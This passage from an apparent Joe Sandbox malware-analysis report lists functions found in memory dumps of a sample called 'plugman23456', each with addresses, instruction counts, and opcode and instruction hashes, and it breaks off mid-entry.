                          • Opcode ID: 77a7a9778035b8eb5b82597b2b563b0a34c5bf57de25521b42a44e8280e56580
                          • Instruction ID: 500350d1d128b7342284dc6fcb864f03b8ddd3d41165e51c0c6cd58ea6d06506
                          • Opcode Fuzzy Hash: 77a7a9778035b8eb5b82597b2b563b0a34c5bf57de25521b42a44e8280e56580
                          • Instruction Fuzzy Hash: 7A01E275D0D208CBDB04CFA5D4582FCBBF8AB4E301F24E11AD14EA62D6E7B489059E64
                          Function 00D72779 Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 85414554c5992b6a368f7a2a08d37810b242a74c8bac336b77f77402e2b945df
                          • Instruction ID: 4e90a718bde3ce079a55b5a97229f61131da01b441da1a3198ce77efd1094856
                          • Opcode Fuzzy Hash: 85414554c5992b6a368f7a2a08d37810b242a74c8bac336b77f77402e2b945df
                          • Instruction Fuzzy Hash: DA1134B4D0924ACFCB44DFA8C8405BEBFF5AB8A300F2480AAC459A3341E3704A01CFA1
                          Function 00D71869 Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9a2ece6707b15eff5ee4b906a38cba6ad1db5002669fab550031d7e2b0d7b420
                          • Instruction ID: c04192d4e47f8974892696235e190fda4a86ffc0ce2a7d0ffeb127adcf8e09d1
                          • Opcode Fuzzy Hash: 9a2ece6707b15eff5ee4b906a38cba6ad1db5002669fab550031d7e2b0d7b420
                          • Instruction Fuzzy Hash: B6110078D09208DFCB04DFE5E4956ACBBB6FF8A300F64D129E84AAB355E7705905CB24
                          Function 0016D1CF Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.377420036.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_16d000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                          • Instruction ID: 141c25bf80f1b53d939537fe1ca140e7b9ed01256c9d9760bc90249b175f6750
                          • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                          • Instruction Fuzzy Hash: DF118B75A04280DFDB12CF14D9D4B25BBA1FB84314F28C6ADDC494B656C33AD85ACBA2
                          Function 00D705F0 Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eaceae9ccdc8819186fb9cc0002040f485674ef7dd0a4d86ddfcbb379825eb13
                          • Instruction ID: f02a17a0ca135ff72e302be3400351c9f642ceb73dc77e09aa98af5ecc0dd7fc
                          • Opcode Fuzzy Hash: eaceae9ccdc8819186fb9cc0002040f485674ef7dd0a4d86ddfcbb379825eb13
                          • Instruction Fuzzy Hash: 43F0AD35D0A114CBCB148FB5E8245FDBF7CABCB301F14A02AC44E73291EBB184159AA8
                          Function 00D70BC8 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7a48dafa23d58ac33bfce580849625a7c9618c5902a01e9f63a69453bcc9cbf0
                          • Instruction ID: a174d356b70c207cc1d9ce5cb163536fd5509080a16b9b00cf4550b85fd2e951
                          • Opcode Fuzzy Hash: 7a48dafa23d58ac33bfce580849625a7c9618c5902a01e9f63a69453bcc9cbf0
                          • Instruction Fuzzy Hash: 151115B4C09209DFCB41DFA9D9442BEBFF4EB4A300F2495AAD849A3291E7344A45DF61
                          Function 00D71F69 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cb6917399389d2833771e96e4d17276654e28319ea8b0ba9df6d6472cdf15630
                          • Instruction ID: 2bf8125b237dc95f3c8795911c148133a55ed286a9909a2caec8bdeca6b009c2
                          • Opcode Fuzzy Hash: cb6917399389d2833771e96e4d17276654e28319ea8b0ba9df6d6472cdf15630
                          • Instruction Fuzzy Hash: 2E113CB9C09249DFCB44CFA8D8445AEBFF4AF4A300F1496AAC849E3251E3744601DF61
                          Function 00D71D16 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 02bf36b66605218c0cd6ea967169feaa0cb7e069b264791fd67e3fb2e64c2e70
                          • Instruction ID: 3c8a2807c4eb2ae1ceb680629736796c58faad94ab6450f638437a237e033c7c
                          • Opcode Fuzzy Hash: 02bf36b66605218c0cd6ea967169feaa0cb7e069b264791fd67e3fb2e64c2e70
                          • Instruction Fuzzy Hash: 5011A478E05209DFCF04DFE4E9944ACBBB6FF9A300B209129E80AAB354E7705846CF10
                          Function 00D72788 Relevance: .0, Instructions: 47COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62ba50e10feff93686b4bb7f64130fee5c6b63320f7c37f4ab81dd13e9d9296f
                          • Instruction ID: 908391d99683cbd3f3333a9cea3868c00873ae311901ddf2ffbacd7dde8ef9ba
                          • Opcode Fuzzy Hash: 62ba50e10feff93686b4bb7f64130fee5c6b63320f7c37f4ab81dd13e9d9296f
                          • Instruction Fuzzy Hash: 4E11A2B8D0420ADFCB44DFA9D9456BEBBF5BB89300F24906AC819A3354E7345A42CF91
                          Function 00D70B08 Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e2661698e98e4c8344a244bd05a761064fd88fbaeb615ad2533872fb94b7e61d
                          • Instruction ID: a74d547a1fd6daf0baa3fe4643182d86179eeed5bfb60ae3d44615d1b8a3accf
                          • Opcode Fuzzy Hash: e2661698e98e4c8344a244bd05a761064fd88fbaeb615ad2533872fb94b7e61d
                          • Instruction Fuzzy Hash: A5018675C09255DFCB019BA4D4183FEBFB4AB46305F1484ABC089A62D2DBB44B09CF61
                          Function 00D70731 Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f2970b78f097b33e5dab6977a530793d7e70dd0d88d9a2294b9c8bc81b54057f
                          • Instruction ID: 311fb44d3873788d4d180d2cb011a587be43905cc1bd5bd032db0de7a64dcc4e
                          • Opcode Fuzzy Hash: f2970b78f097b33e5dab6977a530793d7e70dd0d88d9a2294b9c8bc81b54057f
                          • Instruction Fuzzy Hash: A9018FB4D09209EFCB44DFB4D5215BCBFB5AB8A300F10D4AAD449E7291E7B01A01DF50
                          Function 00D730BE Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9458aede9befa33c8d8f017ba39e121b782aac93ca26ec118cfd70a1e5257035
                          • Instruction ID: ea87328fba05f2af4ace03b454211880139b0fcc51fa8315d5c823b14ceeb3ae
                          • Opcode Fuzzy Hash: 9458aede9befa33c8d8f017ba39e121b782aac93ca26ec118cfd70a1e5257035
                          • Instruction Fuzzy Hash: 72110974A44218DFEB20CF54CC45BDCB7B5BB49304F5080E6D58DAB284D7709A82DF24
                          Function 0015D759 Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.377407957.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_15d000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a6d8f40a8d46e1c7d6e734d79c61a8df9df24c08b5cd8629a8743933798a1bfc
                          • Instruction ID: e45da6571e5fe139d7448a1683c24c4653c61b600913c1bd06e3692580caef20
                          • Opcode Fuzzy Hash: a6d8f40a8d46e1c7d6e734d79c61a8df9df24c08b5cd8629a8743933798a1bfc
                          • Instruction Fuzzy Hash: CD01F771004340EAE7304A15EC84B66BFE8EF45729F28C51AED144E286C779D848C7B1
                          Function 00D70965 Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b2671d2e6e051179800d2d2aefb2b496b49f61871b8c154ab4c52c50764dc09f
                          • Instruction ID: 731af0bfa31329133a81d091e32a7bd7c9b5f8f78d1b638e0bdc5c12b00194da
                          • Opcode Fuzzy Hash: b2671d2e6e051179800d2d2aefb2b496b49f61871b8c154ab4c52c50764dc09f
                          • Instruction Fuzzy Hash: 0E01E875C0D204CBEB04DBA0E4582FCBFB8AB1A311F24A55AD14EB72D2E7748944DE65
                          Function 00D71893 Relevance: .0, Instructions: 42COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3f3ef2b689b3de2a0db0d2a9c5add5538136953cb30d3b40073b0c34fc743233
                          • Instruction ID: b44bde905469bb305ecccbb6a4e2006da3efec30505c9f4dab5be23bae1a87ee
                          • Opcode Fuzzy Hash: 3f3ef2b689b3de2a0db0d2a9c5add5538136953cb30d3b40073b0c34fc743233
                          • Instruction Fuzzy Hash: F8119B78D05218DFDB10DFE8E9956ACBBB5FF4A301F209119E40AAB395E7705902CF24
                          Function 00D732DE Relevance: .0, Instructions: 41COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 01027bd361d0a81a34b67db25201a66bb5197fe2222ef681c34008d46c159ac8
                          • Instruction ID: 5ac11ea930af3ab94c54b89e53d413541d3ee3347766d13f732463d6dfe7564a
                          • Opcode Fuzzy Hash: 01027bd361d0a81a34b67db25201a66bb5197fe2222ef681c34008d46c159ac8
                          • Instruction Fuzzy Hash: 4B01DE75905214CFDB24DF68C984BEDBBF9AB49305F1490DA940DAB252D7309E85DF20
                          Function 00D72C31 Relevance: .0, Instructions: 41COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8404168d262a64737e02c673c8e94cd5dc835b55dd2dce2b2d4704c9b6d669b
                          • Instruction ID: b0eb9a8ac64b48c2af606d6b67ba82a95acd40f9445b702e9da4380d43e687ae
                          • Opcode Fuzzy Hash: d8404168d262a64737e02c673c8e94cd5dc835b55dd2dce2b2d4704c9b6d669b
                          • Instruction Fuzzy Hash: 21F08174C09284AFCB12CFA4D8615BCBF70AB9B301F1882DBC84567295DBB14E05DF61
                          Function 00D718A8 Relevance: .0, Instructions: 40COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4b7be3facda79848505e31ff0fe407f5f5dc351af112c9bb681eeebabb151f46
                          • Instruction ID: 341df54186afa57f0d9b9f4daf3d516c0eb756bc009ed848fbbd618501c13392
                          • Opcode Fuzzy Hash: 4b7be3facda79848505e31ff0fe407f5f5dc351af112c9bb681eeebabb151f46
                          • Instruction Fuzzy Hash: 1601CC78E05308DFCB00DFE4E9556ACBBB5FF4A301F149119E80AAB395E7745902CB24
                          Function 00D70740 Relevance: .0, Instructions: 39COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 520825d1ec48eecb97aa9b86c6d525946ba6af774cf3e1899b426072e384a794
                          • Instruction ID: ef945f8d17ccd0ae76be436710df94d537312d440184f22afa8842b54443eab5
                          • Opcode Fuzzy Hash: 520825d1ec48eecb97aa9b86c6d525946ba6af774cf3e1899b426072e384a794
                          • Instruction Fuzzy Hash: BDF03C74D04208EFCB48DFB9D9556ADBBF5AB8A341F10E0A9D409A7290EB306A01DF54
                          Function 00D701A2 Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c16dde5a546524723670c47a225e89667a971075204ccd73438b3665f72d2f40
                          • Instruction ID: e77052ef2c0b82be56c42a4d74fbbcc257df7fbdbbb43d595a96ccaff968eb40
                          • Opcode Fuzzy Hash: c16dde5a546524723670c47a225e89667a971075204ccd73438b3665f72d2f40
                          • Instruction Fuzzy Hash: FA012830D06219CFCB14DFB4E8486ACBBB1FB4A301F24901AE40AA76A5EB705841DF00
                          Function 00D70124 Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b0a7bba9a3517ca59843ad20ae221ad08262645329209b4f3e9c2fb9b55ab0ff
                          • Instruction ID: 9b1ac4a9914656b2ef6bcb37cfde20ddaf4c7cec3d1e27b3ce419de3de4f69af
                          • Opcode Fuzzy Hash: b0a7bba9a3517ca59843ad20ae221ad08262645329209b4f3e9c2fb9b55ab0ff
                          • Instruction Fuzzy Hash: F2014C34D0A256CFC711DFB4D84869CBFB1BF4A314F54829AD455AB2A5DB705842CF00
                          Function 0015D758 Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.377407957.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_15d000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 81fd046f37f9b5ecfc3f4ef64d9a2011be0926a1a9d7032e16b4b9f301874b13
                          • Instruction ID: 781a9261bc916f7af503aaa26016bfbc6ffb0ef61cbcb350c53f0d4f1f39755e
                          • Opcode Fuzzy Hash: 81fd046f37f9b5ecfc3f4ef64d9a2011be0926a1a9d7032e16b4b9f301874b13
                          • Instruction Fuzzy Hash: 40F0AF31404340DAE7208A06DC88B62FFA8EF41728F28C55AED180E286C3799C48CBB1
                          Function 00D722C8 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c20beb49d2b47798437e397e464e89f1850f4aad72a0a21e768021b86dad6599
                          • Instruction ID: 247d4a4c458418df3c12fd0185b0fd6b309846db76f8fac28e45ed2991dbb8a9
                          • Opcode Fuzzy Hash: c20beb49d2b47798437e397e464e89f1850f4aad72a0a21e768021b86dad6599
                          • Instruction Fuzzy Hash: 66F08270806388EFC715DFB8E8506AD7BB4AB42304F1441EAC84897251E7B54E54CB91
                          Function 00D73370 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 093dc38856531cd5c706bef978092a25e9f29975a0a8c7839d6761ee3cc8a75e
                          • Instruction ID: 6cf1d7e1d9288c6a91220b3c56905df719414479daf7ce91c0c25ada1dfa3499
                          • Opcode Fuzzy Hash: 093dc38856531cd5c706bef978092a25e9f29975a0a8c7839d6761ee3cc8a75e
                          • Instruction Fuzzy Hash: 28016D31908268DFCB60CF64CD48AD8BBB5FF4A305F1440EAD44D6B252C7325A86DF21
                          Function 00D71AE2 Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7c89c5c3273f6b469d3613887a639d07e1be2ec91523041af36c0dcaa791fc7e
                          • Instruction ID: 67ad7470ef4d64a1d589af1aeacc27a6cabe313865fa2ff37282f8650efda1e2
                          • Opcode Fuzzy Hash: 7c89c5c3273f6b469d3613887a639d07e1be2ec91523041af36c0dcaa791fc7e
                          • Instruction Fuzzy Hash: 4AF01D34E09344DFCB01DBE8D8A57ACBBB5FF4A300F1481559809AF39AE7B459058B24
                          Function 00D720E0 Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2b601b2e6319dfbdcdeee7460112397ce6bebdc6b7a641f45a40b77502a26bc2
                          • Instruction ID: 84305866f0d7bd0afd97701f9a060dc29d41ae20fb604a3d08b6f6721ab842cd
                          • Opcode Fuzzy Hash: 2b601b2e6319dfbdcdeee7460112397ce6bebdc6b7a641f45a40b77502a26bc2
                          • Instruction Fuzzy Hash: E6F06578D066449FCB51CFB8D85569C7FF0AB0A301F1482DAD904D7361D3715A04DF11
                          Function 00D72C7D Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 79dc77843497a8db15777de59617eeac43e0609ed418fd21f32c29855552e2c3
                          • Instruction ID: f6dc08a356e9444b7e65167c1b90a74a3790516ad6bb97b33d74e4d22cbce8c3
                          • Opcode Fuzzy Hash: 79dc77843497a8db15777de59617eeac43e0609ed418fd21f32c29855552e2c3
                          • Instruction Fuzzy Hash: 58F01534D05148EFCB54DFA8E8546ADBFB4AB8A301F20D2AAD819A3294D7B04A06DF50
                          Function 00D72C80 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e038aa228ae6fce8c4b690a37e47cf902cad17f9a3849a474cb7e1679d66fab1
                          • Instruction ID: 773a5bc3e364318b39eccc3709aa22c8e2204478d118bafbdf556b47b688b4ed
                          • Opcode Fuzzy Hash: e038aa228ae6fce8c4b690a37e47cf902cad17f9a3849a474cb7e1679d66fab1
                          • Instruction Fuzzy Hash: 4BE06D34D00208EFCB14DFE8E8446ADFBB8BB8A301F10D1AAD818A3354E7B05A01DF50
                          Function 00D701EB Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b3d0397b0149d2b800cb5e1bdc63d7415a6553812b0971cb11af253fd5a9687
                          • Instruction ID: ccd24cfac71e9d9dec8c7b1b547ceabbbb2c116d1d8f584d33f683ad594b1753
                          • Opcode Fuzzy Hash: 5b3d0397b0149d2b800cb5e1bdc63d7415a6553812b0971cb11af253fd5a9687
                          • Instruction Fuzzy Hash: 1BE0123550D244DBCB11CFA4E5095A9BB38FB8B304F216095E84D5B1A2D3225A06DB65
                          Function 00D73583 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e923b609a346de3a05815fe6bce2c9509147c9cc7aa036bef9c19eb8cc10a731
                          • Instruction ID: d99af5e0ca288810084f7ca002e46e644fc074039e144be03d535299f84333a3
                          • Opcode Fuzzy Hash: e923b609a346de3a05815fe6bce2c9509147c9cc7aa036bef9c19eb8cc10a731
                          • Instruction Fuzzy Hash: B3F08C74849114CFEB64CE24C889BE8B7F8AB08314F1480D9C44EAB252CB318B85DF20
                          Function 00D721A9 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6c3b319a3204e75b3035bf2be4a8b976b5bf0d75352126336ed60b0e845cb75f
                          • Instruction ID: 1eee042bf9888b18b168e11756f36ff176a46e273564bd0a52aa4263b9e648b9
                          • Opcode Fuzzy Hash: 6c3b319a3204e75b3035bf2be4a8b976b5bf0d75352126336ed60b0e845cb75f
                          • Instruction Fuzzy Hash: 54E09274C092889FCB01DBA4DC505EE7F74EB46344F1481DAC84837152C6711A5ADB21
                          Function 00D704A5 Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 297de1fa52f72a637307d47acfb1c6c6d8d7258bc5c996fa64481b4fd77d75db
                          • Instruction ID: 5fd31e47241121b56251165c8f49bf77d6a13ef9bb48e93924c48cb45e6fcf9e
                          • Opcode Fuzzy Hash: 297de1fa52f72a637307d47acfb1c6c6d8d7258bc5c996fa64481b4fd77d75db
                          • Instruction Fuzzy Hash: B1E0927A40D105CFCB10CFA0E8045A47EA8BA563497A4A066C48A8B1E2F7608502EA36
                          Function 00D7065F Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4437c3a266acd1c12a7d661b8150218db236247db61ae30a610179e3e967563c
                          • Instruction ID: 8b5f135a84775df3e52c48d68106e4c82944cd16b59ee18c720342aea9a55175
                          • Opcode Fuzzy Hash: 4437c3a266acd1c12a7d661b8150218db236247db61ae30a610179e3e967563c
                          • Instruction Fuzzy Hash: 59E0EE75E19219EBCF00DBE8E4509ECBBF8EB8D310B10A826D459B7254E23098258F64
                          Function 00D70FD8 Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9ae1f21b3143dce3b6c0aba4a39bebd121d60e7010e9c4fbf61f3770ce5a518e
                          • Instruction ID: 6a7c54049de20939b43e222c52e2aaf8e025757d533e69472416298b4b6ed5c1
                          • Opcode Fuzzy Hash: 9ae1f21b3143dce3b6c0aba4a39bebd121d60e7010e9c4fbf61f3770ce5a518e
                          • Instruction Fuzzy Hash: 37E048B48092849FDB15CBB4DC653EC7F709B47241F0841DBC981562A1D6B14A46DF51
                          Function 00D70193 Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: af9252fe189039e7db0786bdeac96a7fe057f7b0fc1f8e63b490584f04cbcf98
